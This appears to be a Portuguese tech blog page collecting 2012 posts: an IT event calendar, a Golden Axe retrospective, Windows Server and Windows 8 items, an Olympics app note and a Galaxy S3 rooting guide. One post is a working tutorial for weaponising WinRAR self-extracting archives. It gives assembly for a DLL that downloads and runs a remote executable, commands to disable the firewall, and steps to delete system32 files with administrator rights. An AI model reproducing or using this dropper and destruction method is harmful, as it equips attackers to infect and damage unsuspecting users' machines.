Agenda de eventos de TI e Segurança do mês de Agosto

Agosto de 2012
01-02 CNASI PE Recife Segurança
02 LCS Fórum São Paulo Tendências, Negócios e Tecnologia
04-05 QCon São Paulo Desenvolvimento
07-08 Congresso de Cloud Computing São Paulo Cloud Computing
08 EMC Forum São Paulo Tendências
08-12 ToorCamp Washington Segurança
10 Fórum CRM 2012 Ribeirão Preto CRM
10 ISRio Rio de Janeiro Segurança
14-15 Gartner – Application Architecture, Development and Integration Summit São Paulo Tendências, Mobilidade, Cloud, Desenvolvimento
21-22 Cloud Computing Evolution São Paulo Cloud Computing
22 TEDx Jardim Botanico Rio de Janeiro Tecnologia, Entretenimento e Design
22-23 2º Fórum Mundial de Cloud Computing
América Latina
São Paulo Cloud Computing
22-26 IT Forum + Praia do Forte – BA IT Business
23 Secure Brasil São Paulo Segurança
23-24 IV Congresso Crimes Eletrônicos São Paulo Segurança e Direito Digital
25-28 13º FISL Porto Alegre Software Livre
26-30 VM World 2012 San Francisco Virtualização e Cloud
27-01 VII Workshop SegInfo Rio de Janeiro Segurança
27-29 III Feira de Empregos de TI Curitiba Mercado de Trabalho / Carreira
28 Qualitek Security Day Natal Segurança, Tecnologia
29-30 PM Tools 2012 São Paulo Gerenciamento de Projetos
29-31 LinuxCon North America San Diego Tecnologia
30-31 BrazilJS Porto Alegre Desenvolvimento
Anúncios

Relembrando do game Golden Axe


Ahhh, Golden Axe! Um clássico eterno do mundo dos games! Com excessão das capas dos cartuchos que na minha opinião eram um pouco #FAIL. Enquanto ainda era apenas arcade, perdi as contas de quantas fichas comprava para jogar este jogo no fliperama, acredito eu que este seja o jogo que mais levou minha suada mesada embora. Quando voltava pra casa ficava pensando em estratégias para matar as malditas caveiras assassinas, ou se esquivar dos dragões que atiravam bolas de fogo, enfim, para os padrões da época, Golden Axe era “O GAME”!

História:

Golden Axe foi criado pela SEGA em 1989 e surgiu primeiramente nos Arcades. Nos anos seguintes foram lançadas cópias para os consoles Master System e Mega Drive da empresa, e depois de um tempo para diversos outros consoles. É um game de ação estilo medieval para 1 ou 2 players. No game os heróis Ax Battler (O Bárbaro), Tyris Flare (A Amazonas) e Gilius Thunderhead (O Anão) enfrentam inimigos que vão desde dragões a caveiras amaldiçoadas atravessando cenários repletos de obstáculos até o castelo de Death Adder, com o objetivo de resgatar o rei e a rainha que foram sequestrados pelo inimigo.

Versões:

O game teve duas continuações na sequência, Golden Axe II e Golden Axe III, mas na época também ganhou uma versão em RPG (no estilo Legend of Zelda do NES) para Master System chamada Golden Axe Warrior. O game também ganhou um remake com gráficos em 3D mas com o mesmo método de visualização lateral. A versão não agradou os fãs da série devido a detalhes como movimentos mal feitos dos heróis e efeitos que confundiam na hora do jogo, ou seja, a experiência foi frustrante.

Em 14 de Dezembro de 2008 a SEGA lançou a última versão do game para os consoles Playstation 3 e XBox 360, que se chamava Golden Axe: Beast Rider (gameplay abaixo). A principal protagonista é a Amazonas Tyris Flare. O game tem padrão 3D em terceira pessoa e tem 3 modos de jogo: Campaign, Challenge e Trial. Através de cada modo é possível desbloquear novas armas e melhorar os poderes da heroína. O game lembra bastante o jogo LOTR – Return of the King do PS2. É o primeiro game da série dedicado ao público adulto devido às diversas cenas de violência e algumas cenas que exploram a sensualidade da Amazonas.

Curiosidades:

Todos os heróis do game têm um motivo a mais para se rebelarem contra Death Adder. Ax Battler, o Bárbaro, teve sua mãe morta por ele. Gilius-Thunderhead, o Anão, perdeu o irmão gêmeo em uma batalha defendendo o lar contra a horda de Death-Adder. Membros da raça Dwarvish, são intrinsecamente ligados pelos valores emocionais e no caso de irmãos gêmeos, isso é intimamente violento. Gilius Thunderhead jurou por tudo que é sagrado unir-se ao irmão derrotando Death-Adder e posteriormente cometendo suicídio. Tyris, a Amazonas, também teve seu pai e sua mãe assassinados por Adder.

Fonte:RockNTech

Roadshow da Comunidade do Windows Server 2012!

E-mail image001

INSCREVA-SE AGORA no

Roadshow da Comunidade do Windows Server 2012!

 

Se Você deseja:

  • Aprender as novidades incoporporadas no Windows Server 2012
  • Conhecer as melhorias da versão
  • Ver recursos incríveis do Windows Server 2012

É a sua chance de se preparar para a nova versão do Windows Server 2012!

Aprenda como:

  • Construir sua nuvem privada, oferecer serviços de nuvem privada ou se conectar de forma segura a serviços de nuvem pública;
  • Aumentar os níveis de eficiência, disponibilidade e gerenciamento;
  • Utilizar uma plataforma aberta de aplicação e Web para datacenter na nuvem;
  • Fornecer acesso seguro ao seu ambiente de trabalho a partir de qualquer lugar.

Publico alvo

Você é um profissional de TI e quer conhecer em primeira mão o Windows Server 2012? Então confira as cidades participantes, inscreva-se hoje mesmo e garanta seu lugar!

Agenda:

  • Boas-vindas e Introdução
  • Sessão 1: Gerenciamento
  • Sessão 2: Virtualização
  • Sessão 3: Armazenamento
  • Sessão 4: Rede
  • Perguntas & Respostas

MVPs Microsoft trazendo a tecnologia até você.
Patrocinado pela Dell, HP, GITCA e Microsoft.

 

INSCREVA-SE

Brasil – Brasília – 7 de agosto

Brasil –  São Paulo – 9 de agosto

Brasil – Rio de Janeiro – 14 de agosto

Guia de Estudos sobre Windows 8

Quer sair na frente no mercado e aprender todas as novidades sobre o Windows 8?
Montei um Guia de estudos com alguns assuntos bem interessantes sobre o Windows 8, espero que gostem.

1-      Parental Controls – Bloqueando Sites
3-      Windows Explorer Parte 2 – Procurar arquivos por data
4-      Configurando o Aplicativo Previsão do Tempo
5-      APP Messaging Parte 1 – Usando Messenger
6-      APP Messaging Parte 2 – Conectado ao Twitter
7-      Habilitando Hyper-V Client
8-      Habilitar Auditoria de acessos em Dispositivos Removíveis
9-      Características das Versões do Windows 8
10-   Habilitar BitLocker somente no espaço usado
11-   Instalando e configurando FTP no Windows 8
12-   Backup Windows 8 – File History
13-   Trocar idioma do Windows 8
14-   Personalizando Tela inicial do Windows 8
15-   Reparando Windows 8
16-   Redefinindo Configurações do Windows 8
17-   Ferramentas Administrativas Windows 8
18-   Prova 70-687 Windows 8 – Dicas
19-   Desativando Tela de Bloqueio
20-   Custos de atualização para Windows 8
21-   Adicionando Menu Iniciar – Windows 8
22-   Configurando Navegador Padrão  – Windows 8
23-   Explorando o Gerenciando de Tarefas – Windows 8

http://www.windows8dicas.com.br/windows8/explorando-o-gerenciando-de-tarefas-windows-8/647

 

Acompanhe os jogos de Londres pelo seu Android

Com o aproximar do início dos Jogos Olímpicos (começam já amanhã, dia 27/Julho e terminam a 12/Agosto), hoje falamos de uma app dedicada a este evento, o London 2012 Results.

O London 2012 Results apresenta o calendário de todas as provas, bem como os seus resultados e as notícias mais importantes deste evento.

 

Para além dos Jogos Olímpicos, esta app também inclui os Jogos Paralímpicos, que decorrem entre 29/Agosto e 9/Setembro.

Portanto, se quiserem estar sempre actualizados com as últimas notícias e resultados dos JO, ou ver o perfil dos atletas, medalhas atribuídas, etc, basta instalar o London 2012 Results e terão sempre todas aas informações actualizadas ao minuto.

Esta app apenas está disponível em inglês.

Burlando sistemas utilizando pacotes SFX

Basicamente um SFX é um pequeno aplicativo que contém arquivos compactados. Pode ser compactados como ZIP ou RAR, a única diferença é que quando você executar o SFX, ele automaticamente irá extrair os arquivos. No entanto, se você adicionar alguns parâmetros, você pode executá-los após a extração ou executar um comando shell antes da extração.

 

As características que nos interessa no SFX são estas:

 

 

No primeiro campo de entrada você pode adicionar um nome de arquivo que já existe na unidade atual ou um dos arquivos extraídos para executar após a extração. No segundo campo de entrada você pode adicionar um nome de arquivo que já existe na unidade atual para executar antes da extração.

 

Execução básica do Windows Shell Command dentro SFX

No primeiro campo, digite este comando:

%SYSTEMDRIVE%\windows\system32\cmd.exe /k shutdown -s -f -t 3600

Agora se gerar este pacote SFX e em seguida executá-lo, irá desligar o computador daqui 1 hora. Brincadeiras old school a parte, observe que você pode fazer com que qualquer outro aplicativo presente no sistema se execute:

%SYSTEMDRIVE%\windows\notepad.exe c:\shtext.txt

Este acima abre um documento de texto no notepad, e já o cria na unidade C com o nome de shtext.txt, bacana não é?.

netsh firewall set opmode disable

Este outro acima desativa o firewall do sistema.

%SYSTEMDRIVE%\Program Files\Internet Explorer\iexplore.exe http://securityhacker.org/

Este outro abre um site usando o Internet Explorer (neste caso você pode usar outro navegador lembrando que deve estar instalado no sistema). E com esta sintaxe você pode rodar diversos comandos ou programas.

 

Algo mais sorrateiro

Esta é uma prova de que usando apenas uma dll pequena no pacote SFX, podemos baixar e executar um aplicativo (que pode ser um vírus ou não).

Para executar esta operação iremos usar:

– O famoso Rundll32 aplicativo da Microsoft, um pequeno aplicativo usado para executar funções DLL de um programa externo. Ele será chamado pelo SFX.
FASM Compiler (Assembler Flat), eu escolhi este compilador, pois é muito fácil de usar e rápido (baixe no site http://flatassembler.net/) ele será usado para criar a nossa dll downloader.

Agora com o FASM já instalado em seu computador, crie uma pasta vazia e crie um arquivo qualquer com o nome de “suadll.asm“. Quando terminar isto, abra o FASM e nele abra este arquivo que acabou de criar, no FASM, neste arquivo, cole o seguinte código:

;-------------------------------
; SFX Downloader via RunDLL32
; Feito por Spo0k3r
; securityhacker.org
;-------------------------------
 
format PE GUI 4.0 DLL
entry DllEntryPoint
 
include 'win32a.inc'
 
;-- rw
section '.data' data readable writeable
 
CMD_OPEN db 'open',0
url db 'http://siteparadownload.org/executavel.exe',0
output db 'c:\\executavel.exe',0
errmsg db 'ERROR',0
errtitle db '',0
okmsg db 'OK',0
oktitle db '',0
 
section '.text' code readable executable
 
proc DllEntryPoint hinstDLL, fdwReason, lpvReserved
mov eax,TRUE
ret
endp
 
;-- Esta funcao ira chamar o rundll32 via SFX pela linha
proc dcscdownload
xor eax, eax
invoke URLDownloadToFile, 0, url, output, 0, NULL ; download
cmp eax, 0
jne enderr
invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute
jmp endok
enderr:
invoke MessageBox, 0, errmsg, errtitle,0
jmp endpr
endok:
invoke MessageBox, 0, okmsg, oktitle,0
endpr:
ret
endp
 
;-- Tabela importar exportar
section '.idata' import data readable writeable
 
library kernel,'KERNEL32.DLL',\
urlmon,'URLMON.DLL',\
Shell32,'SHELL32.DLL',\
user,'USER32.DLL'
 
import Shell32,\
ShellExecute,'ShellExecuteA'
 
import user,\
MessageBox,'MessageBoxA'
 
import urlmon,\
URLDownloadToFile,'URLDownloadToFileA'
 
section '.edata' export data readable
 
export 'OURDLL.DLL',\
dcscdownload,'dcscdownload'
 
section '.reloc' fixups data discardable

NÃO se esqueça de editar a URL e o caminho de saída.

Agora, na barra de menu clique em “Run” “Compile“. E salve na pasta que criou o dll. Após isso sua dll está pronta, agora podemos criar o SFX downloader, vamos seguir os seguintes passos:

  • Clique com o botão direito sobre a dll e vá para a opção “Adicionar para o arquivo…” no WinRAR.
  • Escolha a opção de pacote SFX na lista de opões
  • Vá para aba de Configurações Avançadas
  • Clique no botão Configurações SFX
  • No campo de entrada, adicione:
%APPDATA%\dcsc\ourdll.dll

– No primeiro parâmetro de entrada coloque esta linha

%SYSTEMDRIVE%\windows\system32\rundll32.exe %APPDATA%\dcsc\ourdll.dll, dcscdownload

Agora você pode gerar o seu arquivo, se você tiver corretamente configurar o SFX, então se você executá-lo ele irá baixar e executar o arquivo escolhido após as extrações. Confira a imagem de configuração do SFX:

 

SFX Destruição de arquivo

Como ultimo exemplo irei mostrar para vocês como destruir uma máquina inteira usando apenas opções do SFX.

O gerador de SFX inclui duas outras funções perigosas (Executar como administrador e Excluir arquivos após a extração). A opção Executar como administrador vai pedir para executá-lo como administrador, de modo que o SFX terá todos os direitos sobre o sistema e após a extração, a exclusão de arquivos será legal usar para arquivos maliciosos.

Para usar estas opções, siga os passos:

  • Crie um pacote SFX novo e vá para as opções do SFX (agora você já sabe como)
  • Nas opções SFX vá para a guia Avançado e marque a caixa “Pedido de acesso administrativo”
  • Então, na primeira entrada “Excluir arquivos”, digite a lista de arquivos que deseja excluir separados por um espaço em branco (exemplo: rundll32.exe cmd.exe hello.exe …..)
  • Agora volte para a guia geral e colocar como caminho de extração:
%SYSTEMDRIVE%\windows\system32\

E agora já pode gerar o SFX.

ATENÇÃO: É apenas um exemplo, não execute no seu computador este SFX pois poderá causar danos no sistema se você colocar arquivos a serem excluídos importantes. Se quiser testar, use uma máquina virtual com o Time Machine instalado para poder reverter os problemas causados.

Resumo rápido do que isso faz:
Basicamente, este exemplo irá excluir rundll32.exe, cmd.exe e hello.exe do system32 durante a extração.

Observe: os arquivos a serem apagados serão apenas feitos no caminho da extração, por isso que eu escolhi system32 no caminho de extração e temos que ter o direito de extrair, por isso forçar o SFX para ser executado como administrador.

 

Finalização

Bom, isto foi tudo. Espero que tenha apreciado este artigo sobre uma segurança questionável de um SFX do WinRAR. A partir de agora você percebe o quão perigoso pode ser baixar arquivos da internet pensando ser simples instaladores, o seu antivirus pode não detectar o conteúdo malicioso do SFX por ser criptografado pelo programa, é bom sempre manter um antivírus com detecção de comportamento e para isso recomendo o Comodo Internet Security, é free!

Também quero ressaltar que não sou responsável pelos danos, ou fins que você for utilizar estas dicas.

Fonte:SecurityHacker

Samsung Galaxy S3 – Root + Recovery alternativa

Há quem viva sem ter acesso root no seu smartphone. Outros há, que não dispensam o mesmo.

Os felizes possuidores de um Galaxy S3 podem recorrer ao CF-Root, desenvolvido pelo já mítico Chainfire, para instalar uma recovery alternativa (CWM) e acesso root.

O Mundo Tecnologico não se responsabiliza por eventuais problemas decorrentes da aplicação destes métodos! Se não estiverem familiarizados com a ferramenta ODIN, não experimentem!

O procedimento está em linha com o que já foi em tempos publicado para o primeiro galaxy.

Antes de tudo, têm de ter o driver do SG3 instalado. Têm duas hipóteses:

  • Driver da Samsung instalado  manualmente
  • Instalar o Samsung KIES

Se recorrerem ao KIES, não se esqueçam que devem encerrar o mesmo antes de efectuar os passos em baixo descritos!

1 – Descarregar e descompactar o ODIN;
2 – Descarregar e descompactar o CF-Root;

ATENÇÂO:  o CF-Root só deve ser descompactado uma vez. Se em vez de 1 ficheiro tiverem 3, já descompactaram uma vez a mais!

3 – Desligar o S3;
4 – Correr o ODIN e verificar que está como tudo como na imagem em baixo. Clicar em PDA e escolher o ficheiro descompactado no ponto 2.;

5 – Colocar o S3 em modo DownloadVolume-baixar + Home + Power Button; Recebemos o belo do aviso da praxe.

6 – Clicar em volume-aumentar para continuar.
7 – Atentem na imagem em baixo.
Se continuarem o processo, esta informação vai ser alterada e a garantia será(?) violada.

8 – Ligar o cabo USB ao PC. O SG3 é detectado pelo PC, e posteriormente o ODIN detecta a porta onde o SG3 se encontra ligado.

7 – Caso o SG3 tenha sido correctamente detectado, clicar em Start, caso contrário verificar a instalação do driver. No final desta fase, devem ter no ODIN algo como o apresentado em baixo.

8- O SG3 reinicia (ver check box no ODIN…) e termina o processo de instalação da recovery e root. Podem desligar o cabo USB e aguardar, sem mexer em nada

9 – Tão “simples” quanto isto.

A Samsung implementou algumas funcionalidades para  registar as alterações: reparem nas alterações face à imagem que apresentei em cima.

Como se não fosse bastante, até nas próprias definições à registo das alterações!

Fruto do trabalho do mestre Chainfire, é possível repor o contador de alterações a 0. Para voltar a ter o estado do dispositivo como normal, é preciso mais alguma ginástica. Não sei até que ponto será possível ter tudo como na forma original…

Fonte:AppAndroid